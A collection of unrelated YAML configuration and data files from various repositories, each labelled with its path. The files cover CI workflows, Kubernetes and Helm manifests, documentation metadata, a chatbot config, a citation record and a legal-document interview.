- name: Finish coveralls parallel build
uses: coverallsapp/github-action@master
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
parallel-finished: true
release:
if: "!contains(github.event.commits[0].message, '[skip ci]')"
needs: [commit-lint, code-lint, test-with-node]
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
persist-credentials: false
- name: Setup Node.js environment
uses: actions/setup-node@v2.5.1
with:
node-version: '16'
- name: Install dependencies
run: yarn install --frozen-lockfile
- name: Build
run: yarn build
- name: Disable protection temporary
uses: actions/github-script@v5.0.0
with:
          github-token: '${{ secrets.GASTROBOT_TOKEN }}'
script: |
await github.rest.repos.deleteAdminBranchProtection({
repo: '${{ github.event.repository.name }}',
owner: '${{ github.repository_owner }}',
branch: 'main',
});
- run: npx semantic-release
env:
GITHUB_TOKEN: ${{ secrets.GASTROBOT_TOKEN }}
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
- name: Restore protection
uses: actions/github-script@v5.0.0
if: always()
with:
          github-token: '${{ secrets.GASTROBOT_TOKEN }}'
script: |
await github.rest.repos.setAdminBranchProtection({
repo: '${{ github.event.repository.name }}',
owner: '${{ github.repository_owner }}',
branch: 'main',
});
|
.github/workflows/main.yml
|
params:
- name: classes
type: string
required: false
description: Classes to add to the interactive map.
- name: uniqueId
type: string
required: true
description: unique id for komponent
- name: title
type: string
required: true
description: title of map component
- name: radioControlsName
type: string
required: true
description: unique name of radio group
- name: checkedTable
type: boolean
required: false
description: if true, radio for table will be checked
- name: indicatorOptions
type: object
required: false
description: indicator options
params:
- name: value
type: string
required: true
description: value for indicator radio
- name: title
type: string
required: true
description: title for indicator radio
- name: mapIframeSrc
type: string
required: true
description: map iframe source
- name: mapIframeTitle
type: string
required: true
description: title for map iframe
- name: tableIframeSrc
type: string
required: true
description: table iframe source
- name: tableIframeTitle
type: string
required: true
description: title for table iframe
- name: dataDownload
type: string
required: false
params:
- name: text
type: string
required: true
description: title for data to download
- name: link
type: string
required: true
description: link to data for download
- name: dataSource
type: string
required: false
description: data source
examples:
- name: " - ukážka mapového komponentu 1"
data:
uniqueId: map-id
title: Počet zaočkovaných ľudí (1. aj 2. dávkou)
mapIframeSrc: "/vzory/interactive-map-sample"
      mapIframeTitle: Príkladová mapa na demonštráciu komponentu - interaktívna mapa
tableIframeSrc: "/vzory/interactive-table-sample"
      tableIframeTitle: Príkladová tabuľka na demonštráciu komponentu - interaktívna mapa
radioControlsName: interactive-radios-a
dataSource: NCZI
dataDownload:
text: Stiahnuť údaje (CSV, 42 kb)
link: "/public/assets/data/korona.gov.sk.csv"
- name: " - ukážka mapového komponentu 2"
data:
uniqueId: map-id-1
title: Koronavírus na Slovensku
mapIframeSrc: "/vzory/interactive-map-sample"
      mapIframeTitle: "Príkladová mapa na demonštráciu komponentu - interaktívna mapa"
tableIframeSrc: "/vzory/interactive-table-sample"
      tableIframeTitle: "Príkladová tabuľka na demonštráciu komponentu - interaktívna mapa"
radioControlsName: interactive-radios-b
indicatorOptions:
- title: Celkový stav
value: ''
- title: Počet zaočkovaných 1. dávkou
value: dose1
- title: Počet zaočkovaných 2. dávkou
value: dose2
dataSource: NCZI
dataDownload:
text: Stiahnuť údaje (CSV, 42 kb)
link: "/public/assets/data/korona.gov.sk.csv"
|
src/idsk/components/interactive-map/interactive-map.yaml
|
documentType: LandingData
title: Azure voor containers
metadata:
title: 'Azure voor containers - Quickstarts, zelfstudies, API-verwijzing'
description: 'Aan de slag met containerapps beheren en implementeren met Azure met quickstarts, zelfstudies en hulpprogramma''s voor containers.'
keywords: 'Azure, containers, Docker, API, Kubernetes'
author: dlepow
ms.author: danlep
ms.date: 01/08/2019
ms.topic: article
ms.prod: azure
featureFlags:
- clicktale
ms.technology: azure
ms.devlang: multiple
ms.service: multiple
sections:
- items:
- type: markdown
text: |
Aan de slag met containerapps beheren en implementeren met Azure-hulpprogramma's en -services voor containers.
- title: QuickStarts van vijf minuten
items:
- type: paragraph
text: Leer hoe u containers gebruikt in Azure-services.
- type: list
style: cards
className: cardsM
columns: 2
items:
- href: ../aks/kubernetes-walkthrough.md
title: Een Kubernetes-cluster maken met Azure Kubernetes Service (AKS)
image:
src: /azure/media/index/ContainerService.svg
- href: 'https://docs.microsoft.com/azure/service-fabric/service-fabric-quickstart-containers'
title: Een Windows-containertoepassing implementeren met Service Fabric
image:
src: /azure/media/index/Fabric.svg
- href: 'https://docs.microsoft.com/azure/app-service/containers/quickstart-docker-go'
title: Een in een container geplaatste app maken met Azure Web Apps for Containers
image:
src: 'https://docs.microsoft.com/media/logos/logo_linux.svg'
- href: 'https://docs.microsoft.com/azure/container-registry/container-registry-get-started-azure-cli'
title: Een privé-Docker-register maken met de Azure Container Registry
image:
src: /azure/media/index/container-registry.svg
- href: 'https://docs.microsoft.com/azure/container-instances/container-instances-quickstart'
title: Een container-app op aanvraag uitvoeren in Azure Container Instances
image:
src: /azure/media/index/containerinstances.svg
- title: Zelfstudies met stapsgewijze instructies
items:
- type: paragraph
text: 'Informatie over hoe u containerapps met Azure-services implementeert, beheert en bijwerkt'
- type: list
style: unordered
items:
- html: <a href="/azure/aks/tutorial-kubernetes-prepare-app">Een container bouwen en implementeren in Azure Kubernetes Service</a>
- html: <a href="/azure/service-fabric/service-fabric-host-app-in-a-container">Een .NET-containerapp bouwen en implementeren in Azure Service Fabric</a>
- html: <a href="/azure/app-service/containers/tutorial-multi-container-app">Een app met meerdere containers bouwen in Web App for Containers</a>
- html: <a href="/azure/container-registry/container-registry-tutorial-quick-task">Containerinstallatiekopieën bouwen met Azure Container Registry-taken</a>
- html: <a href="/azure/container-instances/container-instances-tutorial-prepare-app">Een container bouwen en implementeren in Azure Container Instances</a>
- html: <a href="/azure/openshift/tutorial-create-cluster">Een Azure Red Hat OpenShift-cluster maken</a>
- title: Uw vaardigheden ontwikkelen met Microsoft Learn
items:
- type: list
style: cards
className: cardsFTitle
items:
- title: Docker-containers uitvoeren met Azure Container Instances
href: /learn/modules/run-docker-with-azure-container-instances/
image:
src: /learn/achievements/run-docker-with-azure-container-instances.svg
href: /learn/modules/run-docker-with-azure-container-instances/
- title: Containerinstallatiekopieën bouwen en opslaan met Azure Container Registry
href: /learn/modules/build-and-store-container-images/
image:
src: /learn/achievements/build-and-store-container-images.svg
href: /learn/modules/build-and-store-container-images/
|
articles/containers/index.yml
|
language: cpp
# Travis Continuous Integration Build Matrix allows different OS/package/compiler versions to be specified
# Unfortunately, common packages cannot be specified separately, and multidimensional matrices are not yet
# supported, leading to a lot of duplication in the matrix section below.
matrix:
include:
# Ubuntu 12.04 Precise build with GCC
- os: linux
dist: precise
sudo: required
compiler: gcc
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.7.4
addons:
apt:
packages:
- libogre-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
          - libboost-filesystem-dev
# Ubuntu 12.04 Precise build with Clang
- os: linux
dist: precise
sudo: required
compiler: clang
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.7.4
addons:
apt:
packages:
- libogre-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
          - libboost-filesystem-dev
# Ubuntu 14.04 Trusty build with GCC
- os: linux
dist: trusty
compiler: gcc
sudo: required
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.9.0
addons:
apt:
packages:
- libogre-1.9-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
          - libboost-filesystem-dev
# Ubuntu 14.04 Trusty build with Clang
- os: linux
dist: trusty
compiler: clang
sudo: required
env:
- OGRE_HOME=/usr/lib/x86_64-linux-gnu/OGRE-1.9.0
addons:
apt:
packages:
- libogre-1.9-dev
- libboost-system-dev
- libglu1-mesa-dev
- libxt-dev
- libopencv-dev
- tcl
- tk
          - libboost-filesystem-dev
# Setup a X Virtual Framebuffer to allow opening of X display
before_script:
- "export DISPLAY=:99.0"
- "sh -e /etc/init.d/xvfb start"
- sleep 3 # give xvfb some time to start
script:
- mkdir build
- pushd build
- cmake ..
# No unit tests yet
- make
# Collate libhand build artifacts into local "dist" directory (for external applications to link against)
- make install
- popd
# Build examples
- pushd examples
- mkdir build
- pushd build
- cmake ..
- make
- popd
- popd
# Setup runtime link paths (see BUILD.DEBIAN.md)
- export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:${OGRE_HOME}
- sudo ldconfig
# Run LibHand integration test
- ./examples/build/ogre_rendering_test .
|
.travis.yml
|
:freakazoid:
# mode: head - the last block
# mode: irreversible - the block that is confirmed by 2/3 of all block
# producers and is thus irreversible!
:block_mode: irreversible
# Account name for replying.
:account_name: <your Hive bot name>
# Posting wif is used to reply with a comment. See `support/reply.md` to
# customize the comment.
:posting_wif: <your Hive bot posting key>
# Register your bot and get a key: https://www.cleverbot.com/api/
:cleverbot_api_key: <your cleverbot api key>
# List of apps for this bot to ignore (blacklist). It is advisable to ignore
# other instances of freakazoid and all known engagement bots.
:except_apps: freakazoid meep_bot
# List of apps for this bot to pay attention to (whitelist). Useful if you'd
# like to focus only on these apps/sites/tribes. This might also help avoid
# bot-on-bot loops, assuming these bots don't fake their app name.
# :only_apps: hiveblog peakd ecency leofinance stemgeeks weedcash sportstalksocial neoxiancity splintertalk anonramblings
# When someone follows the bot and replies, the bot will follow them, if this
# value is true.
:follow_back: false
# When non-zero, vote for the author only occurs after this many minutes.
:unique_author: 1440
# When non-zero, vote for the author while replying (if the author follows
# the bot).
:vote_weight: 0.00 %
# When non-zero, vote for self while replying.
:self_vote_weight: 0.00 %
# Mirror mute account names is a list of accounts that this bot will use to
# get a list of accounts to mute, in addition to this bot's account_name.
# :mirror_mute_account_names:
# If you are running a meeseeker sync, you can enable that for streaming by
# uncommenting this group. If the meeseeker sync is running on another host,
# update the :url: line with the correct address.
#
# See: https://github.com/inertia186/meeseeker
# :meeseeker_options:
# :url: redis://127.0.0.1:6379/0
:chain_options:
:chain: hive
:url: https://api.hive.blog
|
config.yml
|
SDG_GOAL: >-
<p>Goal 17: Strengthen the means of implementation and revitalize the Global
Partnership for Sustainable Development</p>
SDG_TARGET: >-
<p>Target 17.19: By 2030, build on existing initiatives to develop
measurements of progress on sustainable development that complement gross
domestic product, and support statistical capacity-building in developing
countries</p>
SDG_INDICATOR: >-
<p>Indicator 17.19.2: Proportion of countries that (a) have conducted at least
one population and housing census in the last 10 years; and (b) have achieved
100 per cent birth registration and 80 per cent death registration</p>
META_LAST_UPDATE: <p>2016-07-19</p>
SDG_CUSTODIAN_AGENCIES: <p>United Nations Statistics Division (UNSD)</p>
CONTACT_ORGANISATION: <p>United Nations Statistics Division (UNSD)</p>
STAT_CONC_DEF: >-
<p><strong>Definition:</strong></p>
<p>This information only refers to 17.19.2 (a) </p>
<p>The indicator tracks the proportion of countries that have conducted at
least one population and housing census in the last 10 years. This also
includes countries which compile their detailed population and housing
statistics from population registers, administrative records, sample surveys
or other sources or a combination of those sources.</p>
SOURCE_TYPE: >-
<p>ECOSOC resolution E/RES/2015/10 establishing the 2020 World Population and
Housing Census Programme requests the Secretary-General to "monitor and
regularly report to the Statistical Commission on the implementation of the
Programme". In response to this request UNSD regularly monitors the
progress of implementation of population and housing censuses across Member
States. UNSD sends a survey to all countries soliciting detailed metadata on
census methods at three points (beginning, mid, end) over the 10-year spanning
a census decade (currently the 2020 census round covering the years
2015-2024). In addition, information is also collected through the annual
questionnaires sent to countries as part of the UN Demographic Yearbook
collection.</p>
FREQ_COLL: <p>NA </p>
REL_CAL_POLICY: <p>NA </p>
DATA_SOURCE: <p>National Statistical Office or Census Agency</p>
RATIONALE: >-
<p>Population and housing censuses are one of the primary sources of data
needed for formulating, implementing and monitoring policies and programmes
aimed at inclusive socioeconomic development and environmental sustainability.
Population and housing censuses are an important source for supplying
disaggregated data needed for the measurement of progress of the 2030 Agenda
for Sustainable Development, especially in the context of assessing the
situation of people by income, sex, age, race, ethnicity, migratory status,
disability and geographic location, or other characteristics.</p>
<p>In recognition of the above, the ECOSOC resolution E/RES/2015/10
establishing the 2020 World Population and Housing Census Programme urges
Member States to conduct at least one population and housing census during the
period from 2015 to 2024, taking into account international and regional
recommendations relating to population and housing censuses and giving
particular attention to advance planning, cost efficiency, coverage and the
timely dissemination of, and easy access to, census results for national
stakeholders, the United Nations and other appropriate intergovernmental
organizations in order to inform decisions and facilitate the effective
implementation of development plans and programmes.</p>
<p>The indicator tracks the proportion of countries that have conducted at
least one population and housing census in the last 10 years and hence
provides information on the availability of disaggregated population and
housing data needed for the measurement of progress of the 2030 Agenda for
Sustainable Development.</p>
IMPUTATION: |-
<p><strong>• At country level</strong></p>
<p><strong>• At regional and global levels</strong></p>
COVERAGE: |-
<p><strong>Data availability:</strong></p>
<p>NA</p>
<p><strong>Time series:</strong></p>
<p><strong>Disaggregation:</strong></p>
<p>The indicator could be disaggregated by geographic region.</p>
COMPARABILITY: '<p><strong>Sources of discrepancies:</strong></p>'
OTHER_DOC: >-
<p><strong>URL:</strong></p>
<p>http://unstats.un.org/unsd/demographic/sources/census/wphc/default.htm</p>
<p><strong>References:</strong></p>
<p>Resolution adopted by the ECOSOC on 10 June 2015 establishing the 2020
World Population and Housing Census Programme</p>
<p>United Nations Principles and Recommendations for Population and Housing
Censuses, Rev.3</p>
|
translations-metadata/en/17-19-2a.yml
|
{{- if .Capabilities.APIVersions.Has "vcenter-operator.stable.sap.cc/v1" }}
{{- if .Values.vcenter_exporters.enabled }}
{{- if .Values.vcenter_exporters.exporter_types }}
apiVersion: vcenter-operator.stable.sap.cc/v1
kind: VCenterTemplate
metadata:
name: 'vcenter-datacenter-exporter-deployment'
scope: 'datacenter'
{{ $global_values := .Values }}
template: |
{{- range $exporter_type_values := .Values.vcenter_exporters.exporter_types }}{{`
---
kind: Deployment
apiVersion: extensions/v1beta1
metadata:
name: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
namespace: monsoon3
labels:
system: openstack
service: metrics
spec:
replicas: 1
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 1
maxSurge: 1
template:
metadata:
labels:
component: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
spec:
nodeSelector:
zone: farm
volumes:
- name: maia-etc
configMap:
name: vcenter-exporter-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`
containers:
- name: vcenter-exporter
imagePullPolicy: IfNotPresent
image: `}}{{ required ".Values.vcenter_exporters.docker_repo is missing" $global_values.vcenter_exporters.docker_repo }}/infrastructure-exporters:{{ $global_values.vcenter_exporters.image_version | replace "string:" "" }}{{`
args:
- -f
- /maia-etc/config-{{ name }}-`}}{{ required ".Values.vcenter_exporters.<exporter_type>.name is missing" $exporter_type_values.name }}{{`.yaml
- -t
- `}}{{ $exporter_type_values.name }}{{`
`}}{{- if $global_values.vcenter_exporters.resources.enabled }}{{`
livenessProbe:
exec:
command:
- sh
- -c
- '[ $(ls -l /proc/7/task | wc -l) -lt 10000 ]'
initialDelaySeconds: 45
periodSeconds: 5
resources:
requests:
memory: `}}{{ required ".Values.vcenter_exporters.resources.requests.memory is missing" $global_values.vcenter_exporters.resources.requests.memory | quote }}{{`
limits:
memory: `}}{{ required ".Values.vcenter_exporters.resources.limits.memory is missing" $global_values.vcenter_exporters.resources.limits.memory | quote }}{{`
`}}{{- end }}{{`
volumeMounts:
- mountPath: /maia-etc
name: maia-etc
ports:
- name: metrics
containerPort: `}}{{ required ".Values.vcenter_exporters.prometheus_port is missing" $global_values.vcenter_exporters.prometheus_port | quote}}{{`
`}}
{{- end }}
{{- end }}
{{- end }}
{{- end }}
|
openstack/infra-exporters/vcenter-exporters/templates/vcenter_datacenter_exporter_deployment.yaml
|
pmid: '26347841'
categories:
- name: Symptoms
enabled: true
- name: Case Studies
enabled: true
- name: Therapies
enabled: true
title: >-
Complex Scapular Winging following Total Shoulder Arthroplasty in a Patient
with Ehlers-Danlos Syndrome.
abstract: >-
This is a unique case of a female patient with features of classical and
hypermobile types of Ehlers-Danlos syndrome (EDS) who developed complex
scapular winging from spinal accessory and long thoracic neuropathies. These
neurological problems became manifest after an uncomplicated total shoulder
arthroplasty (TSA). The patient had a complex postoperative course with
extensive work-up in addition to revision shoulder surgery and manipulations
to treat shoulder stiffness. It was eventually suspected that the periscapular
nerve impairments occurred during physical therapy sessions after her TSA.
This interpretation was further supported by genetic evidence that, in
addition to EDS, the patient had an unrecognized genetic propensity for nerve
palsies from stretch or pressure ("hereditary neuropathy with liability to
pressure palsies" (HNPP)). By two years after the TSA the neuropathies had
only partially improved, leaving the patient with persistent scapular winging
and shoulder weakness. With this case we alert surgeons and physical
therapists that patients with EDS can have not only a complicated course after
TSA, but rare concurrent conditions that can further increase the propensity
of neurological injuries that result in compromised shoulder function.
abstractLink: 'https://www.ncbi.nlm.nih.gov/pubmed/26347841'
fullTextLink: 'https://www.ncbi.nlm.nih.gov/pmc/articles/pmid/26347841/'
date: 2015/09
authors:
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
- name: <NAME>
keywords: []
cites:
- pmid: '23845446'
- pmid: '14996885'
- pmid: '10671123'
- pmid: '21459063'
- pmid: '12365568'
- pmid: '23953851'
- pmid: '22737049'
- pmid: '10426439'
- pmid: '15895289'
- pmid: '8849169'
- pmid: '24787332'
- pmid: '1549236'
- pmid: '22353005'
- pmid: '18196359'
- pmid: '10593673'
- pmid: '21862800'
- pmid: '7619192'
- pmid: '10613148'
- pmid: '22556148'
- pmid: '21988036'
- pmid: '19768768'
- pmid: '14973862'
- pmid: '574227'
- pmid: '17661123'
- pmid: '6087210'
- pmid: '20803633'
- pmid: '17581478'
- pmid: '22746029'
- pmid: '22262391'
- pmid: '18137197'
- pmid: '11932971'
- pmid: '25053156'
- pmid: '22484388'
- pmid: '2721020'
- pmid: '23717249'
- pmid: '16538423'
- pmid: '1791365'
- pmid: '16600507'
- pmid: '25175852'
- pmid: '19468892'
- pmid: '9557891'
- pmid: '168836'
- pmid: '23580420'
- pmid: '9296423'
- pmid: '9814939'
- pmid: '7784290'
- pmid: '11641695'
- pmid: '25149929'
- pmid: '8392146'
- pmid: '20507553'
- pmid: '17983693'
- pmid: '479228'
- pmid: '23762718'
- pmid: '19557868'
- pmid: '3343990'
- pmid: '21978433'
- pmid: '5083867'
- pmid: '8393091'
- pmid: '1851333'
- pmid: '14381453'
- pmid: '1913369'
- pmid: '23920413'
- pmid: '16311893'
citedBy: []
|
src/data/citations/26347841.yml
|
items:
- uid: '@azure/ai-form-recognizer.CommonFieldValue'
name: CommonFieldValue
fullName: CommonFieldValue
children:
- '@azure/ai-form-recognizer.CommonFieldValue.boundingBox'
- '@azure/ai-form-recognizer.CommonFieldValue.confidence'
- '@azure/ai-form-recognizer.CommonFieldValue.fieldElements'
- '@azure/ai-form-recognizer.CommonFieldValue.pageNumber'
- '@azure/ai-form-recognizer.CommonFieldValue.text'
langs:
- typeScript
type: interface
summary: Properties common to the recognized text field
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.boundingBox'
name: boundingBox
fullName: boundingBox
children: []
langs:
- typeScript
type: property
summary: 'Bounding box of the field value, if appropriate.'
optional: true
syntax:
content: 'boundingBox?: Point2D[]'
return:
type:
- '@azure/ai-form-recognizer.Point2D[]'
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.confidence'
name: confidence
fullName: confidence
children: []
langs:
- typeScript
type: property
summary: Confidence score.
optional: true
syntax:
content: 'confidence?: number'
return:
type:
- number
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.fieldElements'
name: fieldElements
fullName: fieldElements
children: []
langs:
- typeScript
type: property
summary: >-
When includeFieldElements is set to true, a list of references to the
elements constituting
this field.
optional: true
syntax:
content: 'fieldElements?: FormElement[]'
return:
type:
- '@azure/ai-form-recognizer.FormElement[]'
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.pageNumber'
name: pageNumber
fullName: pageNumber
children: []
langs:
- typeScript
type: property
summary: The 1-based page number in the input document.
optional: true
syntax:
content: 'pageNumber?: number'
return:
type:
- number
description: ''
package: '@azure/ai-form-recognizer'
- uid: '@azure/ai-form-recognizer.CommonFieldValue.text'
name: text
fullName: text
children: []
langs:
- typeScript
type: property
summary: Text content of the recognized field.
optional: true
syntax:
content: 'text?: string'
return:
type:
- string
description: ''
package: '@azure/ai-form-recognizer'
references:
- uid: '@azure/ai-form-recognizer.Point2D[]'
name: 'Point2D[]'
spec.typeScript:
- name: Point2D
fullName: Point2D
uid: '@azure/ai-form-recognizer.Point2D'
- name: '[]'
fullName: '[]'
- uid: '@azure/ai-form-recognizer.FormElement[]'
name: 'FormElement[]'
spec.typeScript:
- name: FormElement
fullName: FormElement
uid: '@azure/ai-form-recognizer.FormElement'
- name: '[]'
fullName: '[]'
|
preview-packages/docs-ref-autogen/@azure/ai-form-recognizer/CommonFieldValue.yml
|
initial: True
code: |
set_language('es')
---
modules:
- .espanol
---
metadata:
title: Acuerdo de Confidencialidad
short title: NDA
description: Acuerdo de confidencialidad
authors:
    - name: <NAME>
      organization: D-Mind Law
revision_date: 01-05-2021
---
mandatory: True
question: Su documento está listo
subquestion: |
Ya puede descargarlo
attachment:
name: NDA ${ parteDiv }
filename: NDA
docx template file: ndaDocassemble.docx
variablename: docNda
buttons:
- Salida: exit
---
objects:
- considerandos: DAList
- rec: DAList.using(object_type=Thing, there_are_any=True, complete_attribute='complete')
---
code: |
rec[i].nombre
rec[i].tipo
rec[i].domicilio
rec[i].representante
rec[i].apellido
rec[i].cargo
rec[i].mail
rec[i].complete = True
rec.counter = i+1
---
question: ¿Desea agregar un considerando?
yesno: considerandos.there_are_any
---
question: Ingrese los considerandos
fields:
- Considerando ${ ordinal(i) }: considerandos[i]
list collect: True
---
question: Ingrese los datos de la Parte Divulgante
fields:
- Nombre de la compañía: parteDiv
- Tipo social: tipoDiv
input type: combobox
choices:
- S.A.
- S.R.L.
- S.A.S.
- Domicilio: domicilioDiv
- Nombre del representante: representanteDiv
- Apellido del representante: apellidoDiv
- Cargo del representante: cargoDiv
- Mail de contacto: mailDiv
datatype: email
---
question: |
% if i == 0:
  Ingrese los datos de la Parte Receptora
% else:
Ingrese los datos de la ${ ordinal(i+1, gender='female') } Parte Receptora
% endif
fields:
- Nombre de la compañía: rec[i].nombre
- Tipo social: rec[i].tipo
input type: combobox
choices:
- S.A.
- S.R.L.
- S.A.S.
- Domicilio: rec[i].domicilio
- Nombre del representante: rec[i].representante
- Apellido del representante: rec[i].apellido
- Cargo del representante: rec[i].cargo
- Mail de contacto: rec[i].mail
datatype: email
---
question: ¿Desea agregar otra Parte receptora?
yesno: rec.there_is_another
---
question: ¿Desea agregar una cláusula de Divulgación Reglamentaria?
yesno: divulgacionReglamentaria
help:
label: Ayuda
heading: |
¿Qué es una Cláusula de Divulgación Reglamentaria?
content: |
    Una Cláusula de Divulgación Reglamentaria prevé la manera en que alguna de las partes podrá compartir información calificada como confidencial con entidades públicas en caso de que éstas lo requieran. Esta cláusula especifica el mecanismo para compartir información en dichos casos y el procedimiento para hacerlo.
---
question: ¿Cuántos años de vigencia tendrá el acuerdo?
fields:
- Tiempo de Vigencia: tiempoVigencia
datatype: integer
---
question: Indique la ley de qué país será aplicable
fields:
  - País: leyAplicable
input type: dropdown
choices:
- Argentina
- Chile
- Paraguay
- Uruguay
---
question: Ingrese los tribunales competentes
subquestion: |
Las Partes aceptan irrevocablemente que toda acción legal, juicio o procedimiento que surja del presente Acuerdo o con relación a él será interpuesto y finalmente resuelto por los tribunales [FIELD tribunalCompetente], con renuncia a cualquier otro fuero que pueda corresponder.
fields:
- Tribunales Competentes: tribunalCompetente
---
question: Ingrese el lugar de firma
fields:
- Lugar de Firma: lugarFirma
---
question: ¿En qué fecha se firmará el acuerdo?
fields:
- Fecha de Firma: fechaFirma
datatype: date
---
code: |
cantidadPartes = rec.counter+1
cantidadPartesWords = nice_number(cantidadPartes)
depends on:
rec.counter
|
docassemble/dmindlaw/data/questions/nda.yml
|
---
kind: InitializerConfiguration
apiVersion: admissionregistration.k8s.io/v1alpha1
metadata:
name: pvlabel.kubernetes.io
initializers:
- name: pvlabel.kubernetes.io
rules:
- apiGroups:
- ""
apiVersions:
- "*"
resources:
- persistentvolumes
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: system:cloud-controller-manager
labels:
kubernetes.io/cluster-service: "true"
rules:
- apiGroups:
- ""
resources:
- nodes
verbs:
- '*'
- apiGroups:
- ""
resources:
- nodes/status
verbs:
- patch
- apiGroups:
- ""
resources:
- services
verbs:
- list
- watch
- patch
- apiGroups:
- ""
resources:
- services/status
verbs:
- update
- apiGroups:
- ""
resources:
- events
verbs:
- create
- patch
- update
# For leader election
- apiGroups:
- ""
resources:
- endpoints
verbs:
- create
- apiGroups:
- ""
resources:
- endpoints
resourceNames:
- "cloud-controller-manager"
verbs:
- get
- list
- watch
- update
- apiGroups:
- ""
resources:
- configmaps
verbs:
- create
- apiGroups:
- ""
resources:
- configmaps
resourceNames:
- "cloud-controller-manager"
verbs:
- get
- update
- apiGroups:
- ""
resources:
- serviceaccounts
verbs:
- create
- apiGroups:
- ""
resources:
- secrets
verbs:
- get
- list
# For the PVL
- apiGroups:
- ""
resources:
- persistentvolumes
verbs:
- list
- watch
- patch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: cce-cloud-controller-manager
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: system:cloud-controller-manager
subjects:
- kind: ServiceAccount
name: cloud-controller-manager
namespace: kube-system
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: cloud-controller-manager
namespace: kube-system
---
# Deploys the CCE cloud-controller-manager into kube-system.
# FIX: moved from extensions/v1beta1 (Deployment was removed from that group
# in Kubernetes 1.16) to apps/v1, available since 1.9; the spec already
# carries the selector.matchLabels that apps/v1 requires.
apiVersion: apps/v1
kind: Deployment
metadata:
  annotations:
    # Legacy critical-pod marker; superseded by priorityClassName on newer
    # clusters — NOTE(review): confirm the target cluster version.
    scheduler.alpha.kubernetes.io/critical-pod: ""
  labels:
    k8s-app: cloud-controller-manager
  name: cce-cloud-controller-manager
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      k8s-app: cloud-controller-manager
  template:
    metadata:
      labels:
        k8s-app: cloud-controller-manager
    spec:
      # Allow scheduling on nodes the cloud provider has not initialized yet.
      tolerations:
      - key: node.cloudprovider.kubernetes.io/uninitialized
        value: "true"
        effect: NoSchedule
      serviceAccountName: cloud-controller-manager
      containers:
      - name: cce-cloud-controller-manager
        image: hub.baidubce.com/jpaas-public/cce-cloud-controller-manager:v1.11-latest
        imagePullPolicy: Always
        args:
        - /usr/local/bin/cce-cloud-controller-manager
        - --v=4
        - --logtostderr=true
        - --cloud-config=/etc/kubernetes/cloud.config
        - --cloud-provider=cce
        - --kubeconfig=/root/.kube/config
        - --allocate-node-cidrs=true
        # Need change: substitute the real cluster CIDR before applying.
        - --cluster-cidr={{cluster-cidr}}
        - --cluster-name=kubernetes
        - --route-reconciliation-period=50s
        volumeMounts:
        - mountPath: /etc/kubernetes/cloud.config
          name: cloud-config
          readOnly: true
        - mountPath: /root/.kube/config
          name: kubeconfig
          readOnly: true
        resources:
          requests:
            cpu: 200m
      volumes:
      - name: cloud-config
        hostPath:
          path: /etc/kubernetes/cloud.config
          type: FileOrCreate
      - name: kubeconfig
        hostPath:
          path: /root/.kube/config
          type: FileOrCreate
|
manifests/cce-cloud-controller-manager-deployment.yaml
|
---
name: Bizimply
description: Bizimply is the solution to employee time and attendance, scheduling,
reporting and timecards with less paperwork and spreadsheets. Reduce costs by up
to 10%
image: http://kinlane-productions2.s3.amazonaws.com/api-evangelist-site/company/1757_logo.png
created: "2021-02-04"
modified: "2021-02-04"
specificationVersion: "0.14"
x-rank: "7"
x-alexaRank: "863818"
url: https://raw.githubusercontent.com/api-network/organizations/main/bizimply.yaml
tags:
- Schedules
- Have API
- Calendaring
- API Not Found
apis: []
x-common:
- type: x-blog
url: https://www.bizimply.com/blog/category/bar-restaurant/
- type: x-blog
url: http://www.bizimply.com/blog/
- type: x-blog
url: https://www.bizimply.com/blog/
- type: x-blog-rss
url: http://www.bizimply.com/blog/feed/
- type: x-careers
url: https://www.bizimply.com/jobs/
- type: x-crunchbase
url: https://crunchbase.com/organization/bizimply
- type: x-crunchbase
url: http://www.crunchbase.com/company/bizimply
- type: x-customers
url: https://www.bizimply.com/customers/
- type: x-developer
url: http://developer.bizimply.com
- type: x-email
url: <EMAIL>
- type: x-facebook
url: https://www.facebook.com/Bizimply
- type: x-instagram
url: https://www.instagram.com/bizimplyhq/
- type: x-integrations
url: https://www.bizimply.com/integrations/
- type: x-linkedin
url: https://www.linkedin.com/company/bizimply
- type: x-news
url: https://www.bizimply.com/newsletter/
- type: x-partner
url: https://www.bizimply.com/partners/
- type: x-partners
url: https://www.bizimply.com/partner/
- type: x-platform
url: https://www.bizimply.com/employee-engagement-platform/
- type: x-pricing
url: https://www.bizimply.com/pricing/
- type: x-pricing
url: https://go.bizimply.com/pricing
- type: x-support
url: http://help.bizimply.com/
- type: x-twitter
url: https://twitter.com/Bizimply
- type: x-website
url: http://www.bizimply.com
include: []
maintainers:
- FN: <NAME>
